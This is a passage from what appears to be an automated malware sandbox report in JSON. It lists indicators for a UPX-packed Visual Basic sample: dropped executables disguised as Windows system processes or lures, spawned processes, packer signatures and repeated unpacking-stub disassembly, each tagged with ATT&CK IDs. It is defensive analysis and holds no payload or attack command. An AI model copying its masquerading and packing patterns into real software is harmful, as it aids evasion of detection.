\"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4k51k4.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IExplorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS .exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C388.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrHelloween.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C38B.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9DA9B.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005188)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004972)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002712)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005440)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005592)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000640)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004996)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005664)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005068)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003392)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003520)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001256)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002640)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005248)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000920)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004800)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004624)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002732)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005620)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00000948)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005820)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001600)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000908)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005848)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003840)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"services.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"shell.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4k51k4.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IExplorer.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS .exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"New Folder.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Empty.pif\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C388.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"MrHelloween.scr\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C38B.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9DA9B.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005188)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004972)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002712)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005440)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005592)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000640)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004996)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005664)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005068)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003392)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003520)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001256)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002640)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005248)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000920)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004800)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004624)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002732)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005620)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00000948)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005820)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001600)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000908)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005848)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003840)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" was detected as \"UPX\" and name: \"Packer\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4k51k4.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4k51k4.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4k51k4.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IExplorer.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"IExplorer.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IExplorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS .exe\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS .exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS .exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"UPX\" and name: \"Packer\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C388.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C388.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C388.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrHelloween.scr\" was detected as \"UPX\" and name: \"Packer\"\n \"MrHelloween.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrHelloween.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C38B.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C38B.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C38B.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9DA9B.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9DA9B.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9DA9B.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has an writable section named 